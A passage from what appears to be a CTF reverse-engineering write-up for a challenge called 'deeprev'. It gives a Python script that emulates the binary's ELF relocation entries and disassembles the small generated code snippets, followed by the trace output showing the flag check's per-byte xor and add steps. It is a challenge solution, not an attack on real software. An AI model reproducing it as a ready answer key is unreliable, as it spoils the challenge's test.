SLOT] [1329] :: [ARRAY SLOT] [1330] :: [ARRAY SLOT] [1331] :: [ARRAY SLOT] [1332] :: [ARRAY SLOT] [1333] :: [ARRAY SLOT] [1334] :: [ARRAY SLOT] [1335] :: [ARRAY SLOT] [1336] :: [ARRAY SLOT] [1337] :: [ARRAY SLOT] [1338] :: [ARRAY SLOT] [1339] :: [ARRAY SLOT] [1340] :: [ARRAY SLOT] [1341] :: [ARRAY SLOT] [1342] :: [ARRAY SLOT] [1343] :: [ARRAY SLOT] [1344] :: [ARRAY SLOT] [1345] :: [ARRAY SLOT] [1346] :: [ARRAY SLOT] [1347] :: [ARRAY SLOT] [1348] :: [ARRAY SLOT] [1349] :: [ARRAY SLOT] [1350] :: [ARRAY SLOT] [1351] :: [ARRAY SLOT] [1352] :: [ARRAY SLOT] [1353] :: [ARRAY SLOT] [1354] :: [ARRAY SLOT] [1355] :: [ARRAY SLOT] [1356] :: [ARRAY SLOT] [1357] :: [ARRAY SLOT] [1358] :: [ARRAY SLOT] [1359] :: [ARRAY SLOT] [1360] :: [ARRAY SLOT] [1361] :: [ARRAY SLOT] [1362] :: [ARRAY SLOT]- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
- 184
- 185
- 186
- 187
- 188
- 189
- 190
- 191
- 192
- 193
- 194
- 195
- 196
- 197
- 198
- 199
- 200
- 201
- 202
- 203
- 204
- 205
- 206
- 207
- 208
- 209
- 210
- 211
- 212
- 213
- 214
- 215
- 216
- 217
- 218
- 219
- 220
- 221
- 222
- 223
- 224
- 225
- 226
- 227
- 228
- 229
- 230
- 231
- 232
- 233
- 234
- 235
- 236
- 237
- 238
- 239
- 240
- 241
- 242
- 243
- 244
- 245
- 246
- 247
- 248
- 249
- 250
- 251
- 252
- 253
- 254
- 255
- 256
- 257
- 258
- 259
- 260
- 261
- 262
- 263
- 264
- 265
- 266
- 267
- 268
- 269
- 270
- 271
- 272
- 273
- 274
- 275
- 276
- 277
- 278
- 279
- 280
- 281
- 282
- 283
- 284
- 285
- 286
- 287
- 288
- 289
- 290
- 291
- 292
- 293
- 294
- 295
- 296
- 297
- 298
- 299
- 300
- 301
- 302
- 303
- 304
- 305
- 306
- 307
- 308
- 309
- 310
- 311
- 312
- 313
- 314
- 315
- 316
- 317
- 318
- 319
- 320
- 321
- 322
- 323
- 324
- 325
- 326
- 327
- 328
- 329
- 330
- 331
- 332
- 333
- 334
- 335
- 336
- 337
- 338
- 339
- 340
- 341
- 342
- 343
- 344
- 345
- 346
- 347
- 348
- 349
- 350
- 351
- 352
- 353
- 354
- 355
- 356
- 357
- 358
- 359
- 360
- 361
- 362
- 363
- 364
- 365
- 366
- 367
- 368
- 369
- 370
- 371
- 372
- 373
- 374
- 375
- 376
- 377
- 378
- 379
- 380
- 381
- 382
- 383
- 384
- 385
- 386
- 387
- 388
- 389
- 390
- 391
- 392
- 393
- 394
- 395
- 396
- 397
- 398
- 399
- 400
- 401
- 402
- 403
- 404
- 405
- 406
- 407
- 408
- 409
- 410
- 411
- 412
- 413
- 414
- 415
- 416
- 417
- 418
- 419
- 420
- 421
- 422
- 423
- 424
- 425
- 426
- 427
- 428
- 429
- 430
- 431
- 432
- 433
- 434
- 435
- 436
- 437
- 438
- 439
- 440
- 441
- 442
- 443
- 444
- 445
- 446
- 447
- 448
- 449
- 450
- 451
- 452
- 453
- 454
- 455
- 456
- 457
- 458
- 459
- 460
- 461
- 462
- 463
- 464
- 465
- 466
- 467
- 468
- 469
- 470
- 471
- 472
- 473
- 474
- 475
- 476
- 477
- 478
- 479
- 480
- 481
- 482
- 483
- 484
- 485
- 486
- 487
- 488
- 489
- 490
- 491
- 492
- 493
- 494
- 495
- 496
- 497
- 498
- 499
- 500
- 501
- 502
- 503
- 504
- 505
- 506
- 507
- 508
- 509
- 510
- 511
- 512
- 513
- 514
- 515
- 516
- 517
- 518
- 519
- 520
- 521
- 522
- 523
- 524
- 525
- 526
- 527
- 528
- 529
- 530
- 531
- 532
- 533
- 534
- 535
- 536
- 537
- 538
- 539
- 540
- 541
- 542
- 543
- 544
- 545
- 546
- 547
- 548
- 549
- 550
- 551
- 552
- 553
- 554
- 555
- 556
- 557
- 558
- 559
- 560
- 561
- 562
- 563
- 564
- 565
- 566
- 567
- 568
- 569
- 570
- 571
- 572
- 573
- 574
- 575
- 576
- 577
- 578
- 579
- 580
- 581
- 582
- 583
- 584
- 585
- 586
- 587
- 588
- 589
- 590
- 591
- 592
- 593
- 594
- 595
- 596
- 597
- 598
- 599
- 600
- 601
- 602
- 603
- 604
- 605
- 606
- 607
- 608
- 609
- 610
- 611
- 612
- 613
- 614
- 615
- 616
- 617
- 618
- 619
- 620
- 621
- 622
- 623
- 624
- 625
- 626
- 627
- 628
- 629
- 630
- 631
- 632
- 633
- 634
- 635
- 636
- 637
- 638
- 639
- 640
- 641
- 642
- 643
- 644
- 645
- 646
- 647
- 648
- 649
- 650
- 651
- 652
- 653
- 654
- 655
- 656
- 657
- 658
- 659
- 660
- 661
- 662
- 663
- 664
- 665
- 666
- 667
- 668
- 669
- 670
- 671
- 672
- 673
- 674
- 675
- 676
- 677
- 678
- 679
- 680
- 681
- 682
- 683
- 684
- 685
- 686
- 687
- 688
- 689
- 690
- 691
- 692
- 693
- 694
- 695
- 696
- 697
- 698
- 699
- 700
- 701
- 702
- 703
- 704
- 705
- 706
- 707
- 708
- 709
- 710
- 711
- 712
- 713
- 714
- 715
- 716
- 717
- 718
- 719
- 720
- 721
- 722
- 723
- 724
- 725
- 726
- 727
- 728
- 729
- 730
- 731
- 732
- 733
- 734
- 735
- 736
- 737
- 738
- 739
- 740
- 741
- 742
- 743
- 744
- 745
- 746
- 747
- 748
- 749
- 750
- 751
- 752
- 753
- 754
- 755
- 756
- 757
- 758
- 759
- 760
- 761
- 762
- 763
- 764
- 765
- 766
- 767
- 768
- 769
- 770
- 771
- 772
- 773
- 774
- 775
- 776
- 777
- 778
- 779
- 780
- 781
- 782
- 783
- 784
- 785
- 786
- 787
- 788
- 789
- 790
- 791
- 792
- 793
- 794
- 795
- 796
- 797
- 798
- 799
- 800
- 801
- 802
- 803
- 804
- 805
- 806
- 807
- 808
- 809
- 810
- 811
- 812
- 813
- 814
- 815
- 816
- 817
- 818
- 819
- 820
- 821
- 822
- 823
- 824
- 825
- 826
- 827
- 828
- 829
- 830
- 831
- 832
- 833
- 834
- 835
- 836
- 837
- 838
- 839
- 840
- 841
- 842
- 843
- 844
- 845
- 846
- 847
- 848
- 849
- 850
- 851
- 852
- 853
- 854
- 855
- 856
4、另
from z3 import * from capstone import * data = open(r"/root/桌面/deeprev", "rb").read() mem = [b for b in b'\0' * 0x804000 + data[0x4000:0x25a000]] md = Cs(CS_ARCH_X86, CS_MODE_64) def write64(addr, val): for i in range(8): mem[addr + i] = (val >> (8 * i)) & 0xff def write32(addr, val): for i in range(4): mem[addr + i] = (val >> (8 * i)) & 0xff def writen(addr, val, n): for i in range(n): mem[addr + i] = (val >> (8 * i)) & 0xff def read64(addr): r = 0 for i in range(8): r += (mem[addr + i] << (8 * i)) return r def readn(addr, n): r = 0 for i in range(n): r += (mem[addr + i] << (8 * i)) return r for i in range(28): mem[0x404040 + i] = 0x61 + i pc = 0x8042ba dynsym = 0x80406c regs = {} for i in range(1, 11): regs[dynsym + i * 24] = "VAL_" + chr(ord('A') + i - 1) regs[dynsym + 8 + i * 24] = "LEN_" + chr(ord('A') + i - 1) regs[dynsym - 8 + i * 24] = "TYPE_" + chr(ord('A') + i - 1) shellcode = open("shell.bin", "wb") while pc < 0x080B952: print("{:08x}: ".format(pc), end="") # if pc == 0x00a57b02: # print(hex(read64(0x8040ac))) # break r_offset = read64(pc) r_type = read64(pc + 8) & 0xffff r_sym = read64(pc + 8) >> 32 r_addend = read64(pc + 16) print_offset = hex(r_offset)[2:] print_addend = hex(r_addend)[2:] if r_offset in regs: print_offset = regs[r_offset] if r_addend in regs: print_addend = "&" + regs[r_addend] sym_addr = dynsym + r_sym * 24 if r_type == 8: write64(r_offset, r_addend) # print("RELA\t{}\t{:x}".format(print_offset, r_addend)) print("{} \t<- {}".format(print_offset, print_addend)) elif r_type == 5: sym_len = read64(sym_addr + 8) writen(r_offset, r_addend + readn(read64(sym_addr), sym_len), sym_len) # print("COPY\t{}\t{}\t{:x}".format(print_offset, regs[sym_addr], r_addend)) print("{} \t<- [{} + {}]".format(print_offset, regs[sym_addr], print_addend)) elif r_type == 1: if read64(0x8040ac) == 0x1000a0000001a and r_sym == 3: shell_len = read64(pc + 24 * 2 + 16) shell_addr = read64(0x8040b4) shellcode.write(bytes(mem[shell_addr:shell_addr + shell_len])) code = bytes(mem[shell_addr:shell_addr + shell_len]) write64(r_offset, 0) # print("__64\t{}\t{}\t{:x} SHELLCODE".format(print_offset, regs[sym_addr], r_addend)) print("{} \t<- SHELLCODE".format(print_offset)) print('-' * 20) for i in md.disasm(code, 0): if i.mnemonic == 'ret': break print(" 0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str.replace('0x8040e4', 's5').replace('0x8040cc', 's4'))) print('-' * 20) else: write64(r_offset, r_addend + read64(sym_addr)) # print("__64\t{}\t{}\t{:x}".format(print_offset, regs[sym_addr], r_addend)) print("{} \t<- {} + {}".format(print_offset, regs[sym_addr], print_addend)) elif r_type == 0xa: write32(r_offset, r_addend + read64(sym_addr)) # print("__32\t{}\t{}\t{:x}".format(print_offset, regs[sym_addr], r_addend)) print("{} \t<- DWORD({} + {})".format(print_offset, regs[sym_addr], print_addend)) elif r_type == 0: break else: print("UNKNOWN R_TYPE") break pc += 24 print(mem[0x404064])- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
5、输出内容
008042ba: 804000 <- 0 008042d2: 804000 <- 0 008042ea: VAL_B <- 404040 00804302: LEN_B <- 1 0080431a: VAL_D <- [VAL_B + 0] 00804332: 804000 <- 0 0080434a: 804332 <- 16008040cc253480 00804362: 80433a <- c3 0080437a: VAL_C <- 804332 00804392: TYPE_C <- 1000a0000001a 008043aa: 804332 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x16 -------------------- 008043c2: VAL_B <- a53f62 008043da: LEN_B <- 18 008043f2: 804332 <- [VAL_B + 0] 0080440a: 804000 <- 0 00804422: 80440a <- 8040cc250480 0080443a: 804412 <- c3 00804452: VAL_C <- 80440a 0080446a: TYPE_C <- 1000a0000001a 00804482: 80440a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0 -------------------- 0080449a: 80440a <- [VAL_B + 0] 008044b2: VAL_B <- &VAL_D 008044ca: LEN_B <- 1 008044e2: 8042ba <- [VAL_B + 0] 008044fa: VAL_B <- 404041 00804512: VAL_D <- [VAL_B + 0] 0080452a: 804000 <- 0 00804542: 80452a <- 17008040cc253480 0080455a: 804532 <- c3 00804572: VAL_C <- 80452a 0080458a: TYPE_C <- 1000a0000001a 008045a2: 80452a <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x17 -------------------- 008045ba: VAL_B <- a53f62 008045d2: LEN_B <- 18 008045ea: 80452a <- [VAL_B + 0] 00804602: 804000 <- 0 0080461a: 804602 <- 1008040cc250480 00804632: 80460a <- c3 0080464a: VAL_C <- 804602 00804662: TYPE_C <- 1000a0000001a 0080467a: 804602 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 1 -------------------- 00804692: 804602 <- [VAL_B + 0] 008046aa: VAL_B <- &VAL_D 008046c2: LEN_B <- 1 008046da: 8042bb <- [VAL_B + 0] 008046f2: VAL_B <- 404042 0080470a: VAL_D <- [VAL_B + 0] 00804722: 804000 <- 0 0080473a: 804722 <- 10008040cc253480 00804752: 80472a <- c3 0080476a: VAL_C <- 804722 00804782: TYPE_C <- 1000a0000001a 0080479a: 804722 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x10 -------------------- 008047b2: VAL_B <- a53f62 008047ca: LEN_B <- 18 008047e2: 804722 <- [VAL_B + 0] 008047fa: 804000 <- 0 00804812: 8047fa <- 2008040cc250480 0080482a: 804802 <- c3 00804842: VAL_C <- 8047fa 0080485a: TYPE_C <- 1000a0000001a 00804872: 8047fa <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 2 -------------------- 0080488a: 8047fa <- [VAL_B + 0] 008048a2: VAL_B <- &VAL_D 008048ba: LEN_B <- 1 008048d2: 8042bc <- [VAL_B + 0] 008048ea: VAL_B <- 404043 00804902: VAL_D <- [VAL_B + 0] 0080491a: 804000 <- 0 00804932: 80491a <- 12008040cc253480 0080494a: 804922 <- c3 00804962: VAL_C <- 80491a 0080497a: TYPE_C <- 1000a0000001a 00804992: 80491a <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x12 -------------------- 008049aa: VAL_B <- a53f62 008049c2: LEN_B <- 18 008049da: 80491a <- [VAL_B + 0] 008049f2: 804000 <- 0 00804a0a: 8049f2 <- 3008040cc250480 00804a22: 8049fa <- c3 00804a3a: VAL_C <- 8049f2 00804a52: TYPE_C <- 1000a0000001a 00804a6a: 8049f2 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 3 -------------------- 00804a82: 8049f2 <- [VAL_B + 0] 00804a9a: VAL_B <- &VAL_D 00804ab2: LEN_B <- 1 00804aca: 8042bd <- [VAL_B + 0] 00804ae2: VAL_B <- 404044 00804afa: VAL_D <- [VAL_B + 0] 00804b12: 804000 <- 0 00804b2a: 804b12 <- 10008040cc253480 00804b42: 804b1a <- c3 00804b5a: VAL_C <- 804b12 00804b72: TYPE_C <- 1000a0000001a 00804b8a: 804b12 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x10 -------------------- 00804ba2: VAL_B <- a53f62 00804bba: LEN_B <- 18 00804bd2: 804b12 <- [VAL_B + 0] 00804bea: 804000 <- 0 00804c02: 804bea <- 4008040cc250480 00804c1a: 804bf2 <- c3 00804c32: VAL_C <- 804bea 00804c4a: TYPE_C <- 1000a0000001a 00804c62: 804bea <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 4 -------------------- 00804c7a: 804bea <- [VAL_B + 0] 00804c92: VAL_B <- &VAL_D 00804caa: LEN_B <- 1 00804cc2: 8042be <- [VAL_B + 0] 00804cda: VAL_B <- 404045 00804cf2: VAL_D <- [VAL_B + 0] 00804d0a: 804000 <- 0 00804d22: 804d0a <- 11008040cc253480 00804d3a: 804d12 <- c3 00804d52: VAL_C <- 804d0a 00804d6a: TYPE_C <- 1000a0000001a 00804d82: 804d0a <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x11 -------------------- 00804d9a: VAL_B <- a53f62 00804db2: LEN_B <- 18 00804dca: 804d0a <- [VAL_B + 0] 00804de2: 804000 <- 0 00804dfa: 804de2 <- 5008040cc250480 00804e12: 804dea <- c3 00804e2a: VAL_C <- 804de2 00804e42: TYPE_C <- 1000a0000001a 00804e5a: 804de2 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 5 -------------------- 00804e72: 804de2 <- [VAL_B + 0] 00804e8a: VAL_B <- &VAL_D 00804ea2: LEN_B <- 1 00804eba: 8042bf <- [VAL_B + 0] 00804ed2: VAL_B <- 404046 00804eea: VAL_D <- [VAL_B + 0] 00804f02: 804000 <- 0 00804f1a: 804f02 <- 12008040cc253480 00804f32: 804f0a <- c3 00804f4a: VAL_C <- 804f02 00804f62: TYPE_C <- 1000a0000001a 00804f7a: 804f02 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x12 -------------------- 00804f92: VAL_B <- a53f62 00804faa: LEN_B <- 18 00804fc2: 804f02 <- [VAL_B + 0] 00804fda: 804000 <- 0 00804ff2: 804fda <- 6008040cc250480 0080500a: 804fe2 <- c3 00805022: VAL_C <- 804fda 0080503a: TYPE_C <- 1000a0000001a 00805052: 804fda <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 6 -------------------- 0080506a: 804fda <- [VAL_B + 0] 00805082: VAL_B <- &VAL_D 0080509a: LEN_B <- 1 008050b2: 8042c0 <- [VAL_B + 0] 008050ca: VAL_B <- 404047 008050e2: VAL_D <- [VAL_B + 0] 008050fa: 804000 <- 0 00805112: 8050fa <- 13008040cc253480 0080512a: 805102 <- c3 00805142: VAL_C <- 8050fa 0080515a: TYPE_C <- 1000a0000001a 00805172: 8050fa <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x13 -------------------- 0080518a: VAL_B <- a53f62 008051a2: LEN_B <- 18 008051ba: 8050fa <- [VAL_B + 0] 008051d2: 804000 <- 0 008051ea: 8051d2 <- 7008040cc250480 00805202: 8051da <- c3 0080521a: VAL_C <- 8051d2 00805232: TYPE_C <- 1000a0000001a 0080524a: 8051d2 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 7 -------------------- 00805262: 8051d2 <- [VAL_B + 0] 0080527a: VAL_B <- &VAL_D 00805292: LEN_B <- 1 008052aa: 8042c1 <- [VAL_B + 0] 008052c2: VAL_B <- 404048 008052da: VAL_D <- [VAL_B + 0] 008052f2: 804000 <- 0 0080530a: 8052f2 <- 14008040cc253480 00805322: 8052fa <- c3 0080533a: VAL_C <- 8052f2 00805352: TYPE_C <- 1000a0000001a 0080536a: 8052f2 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x14 -------------------- 00805382: VAL_B <- a53f62 0080539a: LEN_B <- 18 008053b2: 8052f2 <- [VAL_B + 0] 008053ca: 804000 <- 0 008053e2: 8053ca <- 8008040cc250480 008053fa: 8053d2 <- c3 00805412: VAL_C <- 8053ca 0080542a: TYPE_C <- 1000a0000001a 00805442: 8053ca <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 8 -------------------- 0080545a: 8053ca <- [VAL_B + 0] 00805472: VAL_B <- &VAL_D 0080548a: LEN_B <- 1 008054a2: 8042c2 <- [VAL_B + 0] 008054ba: VAL_B <- 404049 008054d2: VAL_D <- [VAL_B + 0] 008054ea: 804000 <- 0 00805502: 8054ea <- 15008040cc253480 0080551a: 8054f2 <- c3 00805532: VAL_C <- 8054ea 0080554a: TYPE_C <- 1000a0000001a 00805562: 8054ea <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x15 -------------------- 0080557a: VAL_B <- a53f62 00805592: LEN_B <- 18 008055aa: 8054ea <- [VAL_B + 0] 008055c2: 804000 <- 0 008055da: 8055c2 <- 9008040cc250480 008055f2: 8055ca <- c3 0080560a: VAL_C <- 8055c2 00805622: TYPE_C <- 1000a0000001a 0080563a: 8055c2 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 9 -------------------- 00805652: 8055c2 <- [VAL_B + 0] 0080566a: VAL_B <- &VAL_D 00805682: LEN_B <- 1 0080569a: 8042c3 <- [VAL_B + 0] 008056b2: VAL_B <- 40404a 008056ca: VAL_D <- [VAL_B + 0] 008056e2: 804000 <- 0 008056fa: 8056e2 <- 16008040cc253480 00805712: 8056ea <- c3 0080572a: VAL_C <- 8056e2 00805742: TYPE_C <- 1000a0000001a 0080575a: 8056e2 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x16 -------------------- 00805772: VAL_B <- a53f62 0080578a: LEN_B <- 18 008057a2: 8056e2 <- [VAL_B + 0] 008057ba: 804000 <- 0 008057d2: 8057ba <- a008040cc250480 008057ea: 8057c2 <- c3 00805802: VAL_C <- 8057ba 0080581a: TYPE_C <- 1000a0000001a 00805832: 8057ba <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0xa -------------------- 0080584a: 8057ba <- [VAL_B + 0] 00805862: VAL_B <- &VAL_D 0080587a: LEN_B <- 1 00805892: 8042c4 <- [VAL_B + 0] 008058aa: VAL_B <- 40404b 008058c2: VAL_D <- [VAL_B + 0] 008058da: 804000 <- 0 008058f2: 8058da <- 17008040cc253480 0080590a: 8058e2 <- c3 00805922: VAL_C <- 8058da 0080593a: TYPE_C <- 1000a0000001a 00805952: 8058da <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x17 -------------------- 0080596a: VAL_B <- a53f62 00805982: LEN_B <- 18 0080599a: 8058da <- [VAL_B + 0] 008059b2: 804000 <- 0 008059ca: 8059b2 <- b008040cc250480 008059e2: 8059ba <- c3 008059fa: VAL_C <- 8059b2 00805a12: TYPE_C <- 1000a0000001a 00805a2a: 8059b2 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0xb -------------------- 00805a42: 8059b2 <- [VAL_B + 0] 00805a5a: VAL_B <- &VAL_D 00805a72: LEN_B <- 1 00805a8a: 8042c5 <- [VAL_B + 0] 00805aa2: VAL_B <- 40404c 00805aba: VAL_D <- [VAL_B + 0] 00805ad2: 804000 <- 0 00805aea: 805ad2 <- 18008040cc253480 00805b02: 805ada <- c3 00805b1a: VAL_C <- 805ad2 00805b32: TYPE_C <- 1000a0000001a 00805b4a: 805ad2 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x18 -------------------- 00805b62: VAL_B <- a53f62 00805b7a: LEN_B <- 18 00805b92: 805ad2 <- [VAL_B + 0] 00805baa: 804000 <- 0 00805bc2: 805baa <- c008040cc250480 00805bda: 805bb2 <- c3 00805bf2: VAL_C <- 805baa 00805c0a: TYPE_C <- 1000a0000001a 00805c22: 805baa <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0xc -------------------- 00805c3a: 805baa <- [VAL_B + 0] 00805c52: VAL_B <- &VAL_D 00805c6a: LEN_B <- 1 00805c82: 8042c6 <- [VAL_B + 0] 00805c9a: VAL_B <- 40404d 00805cb2: VAL_D <- [VAL_B + 0] 00805cca: 804000 <- 0 00805ce2: 805cca <- 19008040cc253480 00805cfa: 805cd2 <- c3 00805d12: VAL_C <- 805cca 00805d2a: TYPE_C <- 1000a0000001a 00805d42: 805cca <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x19 -------------------- 00805d5a: VAL_B <- a53f62 00805d72: LEN_B <- 18 00805d8a: 805cca <- [VAL_B + 0] 00805da2: 804000 <- 0 00805dba: 805da2 <- d008040cc250480 00805dd2: 805daa <- c3 00805dea: VAL_C <- 805da2 00805e02: TYPE_C <- 1000a0000001a 00805e1a: 805da2 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0xd -------------------- 00805e32: 805da2 <- [VAL_B + 0] 00805e4a: VAL_B <- &VAL_D 00805e62: LEN_B <- 1 00805e7a: 8042c7 <- [VAL_B + 0] 00805e92: VAL_B <- 40404e 00805eaa: VAL_D <- [VAL_B + 0] 00805ec2: 804000 <- 0 00805eda: 805ec2 <- 24008040cc253480 00805ef2: 805eca <- c3 00805f0a: VAL_C <- 805ec2 00805f22: TYPE_C <- 1000a0000001a 00805f3a: 805ec2 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x24 -------------------- 00805f52: VAL_B <- a53f62 00805f6a: LEN_B <- 18 00805f82: 805ec2 <- [VAL_B + 0] 00805f9a: 804000 <- 0 00805fb2: 805f9a <- e008040cc250480 00805fca: 805fa2 <- c3 00805fe2: VAL_C <- 805f9a 00805ffa: TYPE_C <- 1000a0000001a 00806012: 805f9a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0xe -------------------- 0080602a: 805f9a <- [VAL_B + 0] 00806042: VAL_B <- &VAL_D 0080605a: LEN_B <- 1 00806072: 8042c8 <- [VAL_B + 0] 0080608a: VAL_B <- 40404f 008060a2: VAL_D <- [VAL_B + 0] 008060ba: 804000 <- 0 008060d2: 8060ba <- 2c008040cc253480 008060ea: 8060c2 <- c3 00806102: VAL_C <- 8060ba 0080611a: TYPE_C <- 1000a0000001a 00806132: 8060ba <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x2c -------------------- 0080614a: VAL_B <- a53f62 00806162: LEN_B <- 18 0080617a: 8060ba <- [VAL_B + 0] 00806192: 804000 <- 0 008061aa: 806192 <- f008040cc250480 008061c2: 80619a <- c3 008061da: VAL_C <- 806192 008061f2: TYPE_C <- 1000a0000001a 0080620a: 806192 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0xf -------------------- 00806222: 806192 <- [VAL_B + 0] 0080623a: VAL_B <- &VAL_D 00806252: LEN_B <- 1 0080626a: 8042c9 <- [VAL_B + 0] 00806282: VAL_B <- 404050 0080629a: VAL_D <- [VAL_B + 0] 008062b2: 804000 <- 0 008062ca: 8062b2 <- 26008040cc253480 008062e2: 8062ba <- c3 008062fa: VAL_C <- 8062b2 00806312: TYPE_C <- 1000a0000001a 0080632a: 8062b2 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x26 -------------------- 00806342: VAL_B <- a53f62 0080635a: LEN_B <- 18 00806372: 8062b2 <- [VAL_B + 0] 0080638a: 804000 <- 0 008063a2: 80638a <- 10008040cc250480 008063ba: 806392 <- c3 008063d2: VAL_C <- 80638a 008063ea: TYPE_C <- 1000a0000001a 00806402: 80638a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x10 -------------------- 0080641a: 80638a <- [VAL_B + 0] 00806432: VAL_B <- &VAL_D 0080644a: LEN_B <- 1 00806462: 8042ca <- [VAL_B + 0] 0080647a: VAL_B <- 404051 00806492: VAL_D <- [VAL_B + 0] 008064aa: 804000 <- 0 008064c2: 8064aa <- 1e008040cc253480 008064da: 8064b2 <- c3 008064f2: VAL_C <- 8064aa 0080650a: TYPE_C <- 1000a0000001a 00806522: 8064aa <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x1e -------------------- 0080653a: VAL_B <- a53f62 00806552: LEN_B <- 18 0080656a: 8064aa <- [VAL_B + 0] 00806582: 804000 <- 0 0080659a: 806582 <- 11008040cc250480 008065b2: 80658a <- c3 008065ca: VAL_C <- 806582 008065e2: TYPE_C <- 1000a0000001a 008065fa: 806582 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x11 -------------------- 00806612: 806582 <- [VAL_B + 0] 0080662a: VAL_B <- &VAL_D 00806642: LEN_B <- 1 0080665a: 8042cb <- [VAL_B + 0] 00806672: VAL_B <- 404052 0080668a: VAL_D <- [VAL_B + 0] 008066a2: 804000 <- 0 008066ba: 8066a2 <- 1f008040cc253480 008066d2: 8066aa <- c3 008066ea: VAL_C <- 8066a2 00806702: TYPE_C <- 1000a0000001a 0080671a: 8066a2 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x1f -------------------- 00806732: VAL_B <- a53f62 0080674a: LEN_B <- 18 00806762: 8066a2 <- [VAL_B + 0] 0080677a: 804000 <- 0 00806792: 80677a <- 12008040cc250480 008067aa: 806782 <- c3 008067c2: VAL_C <- 80677a 008067da: TYPE_C <- 1000a0000001a 008067f2: 80677a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x12 -------------------- 0080680a: 80677a <- [VAL_B + 0] 00806822: VAL_B <- &VAL_D 0080683a: LEN_B <- 1 00806852: 8042cc <- [VAL_B + 0] 0080686a: VAL_B <- 404053 00806882: VAL_D <- [VAL_B + 0] 0080689a: 804000 <- 0 008068b2: 80689a <- 20008040cc253480 008068ca: 8068a2 <- c3 008068e2: VAL_C <- 80689a 008068fa: TYPE_C <- 1000a0000001a 00806912: 80689a <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x20 -------------------- 0080692a: VAL_B <- a53f62 00806942: LEN_B <- 18 0080695a: 80689a <- [VAL_B + 0] 00806972: 804000 <- 0 0080698a: 806972 <- 13008040cc250480 008069a2: 80697a <- c3 008069ba: VAL_C <- 806972 008069d2: TYPE_C <- 1000a0000001a 008069ea: 806972 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x13 -------------------- 00806a02: 806972 <- [VAL_B + 0] 